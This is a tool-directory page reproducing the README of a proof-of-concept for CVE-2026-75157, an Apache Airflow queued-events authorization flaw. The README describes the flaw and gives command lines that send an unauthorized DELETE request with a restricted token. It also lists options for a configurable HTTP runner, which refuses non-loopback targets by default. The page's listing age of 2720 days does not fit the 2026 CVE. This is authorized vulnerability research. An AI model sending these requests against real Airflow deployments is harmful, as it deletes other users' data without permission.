Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2026-75157-poc — Standalone authorized universal HTTP PoC for CVE-2026-75157 | Kitploit
Tools/GitHubGitHub/licitrasimone/cve-2026-75157-poc
Vulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingWeb SecurityPenetration Testing
GitHublicitrasimone/cve-2026-75157-poc

cve-2026-75157-poc

Standalone authorized universal HTTP PoC for CVE-2026-75157

View Repository
2720 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-75157 PoC

Authorized security research PoC for the Apache Airflow queued-events authorization flaw in versions before 3.3.2.

Scope

Run only against an Airflow instance you own or are explicitly authorized to test. The default runner refuses non-loopback targets. This repository contains no scanning, target enumeration, persistence, credential theft, or destructive payload logic.

Files

README.md
poc.py

poc.py is a universal, target-aware HTTP request runner. It accepts the target URL, method, path, headers, body, authentication source, and expected result from the command line instead of hard-coding a host.

Usage

Health check against a local Airflow lab:

python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/monitor/health \
  --method GET \
  --expect-status 200 \
  --expect-body healthy

CVE trigger against an already prepared local vulnerable Airflow instance:

export AIRFLOW_POC_TOKEN='lab-only-restricted-token'
python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/dags/cve_2026_75157_poc_dag/assets/queuedEvents \
  --method DELETE \
  --bearer-env AIRFLOW_POC_TOKEN \
  --expect-status 204

The token must belong to a disposable principal with DAG read access and Assets delete access. The expected vulnerable behavior is that the restricted principal can delete the queued-event. Airflow 3.3.2 or later should reject the same request unless the principal also has DAG edit access.

Options

--target URL              Required absolute HTTP(S) target
--path PATH               Optional path joined to --target
--method METHOD           GET, POST, PUT, PATCH, DELETE, HEAD
--header 'Name: Value'    Repeatable request header
--bearer-env ENV          Read a bearer token from ENV without printing it
--json JSON               JSON request body
--body-file FILE          Raw request body
--expect-status STATUS    Repeatable expected status assertion
--expect-body TEXT        Repeatable response-body assertion
--timeout SECONDS
--no-follow-redirect
--allow-non-loopback      Explicit opt-in for an authorized non-lab target

The runner returns exit code 0 for a passing assertion, 1 for scope/transport/argument errors, and 2 for an HTTP assertion failure. Authorization and cookie values are redacted in output.

Vulnerability context

Before Airflow 3.3.2, queued-events DELETE routes checked the DAG axis with read permission rather than edit permission. The fix changes the DAG authorization requirement to the write-level permission. This PoC sends the real HTTP request; it does not create the lab user or database fixture.

References

  • https://www.openwall.com/lists/oss-security/2026/09/18/1
  • https://github.com/apache/airflow/pull/71736
  • https://airflow.apache.org/docs/apache-airflow/3.3.1/howto/docker-compose/index.html
  • https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/access-control.html
Download Tool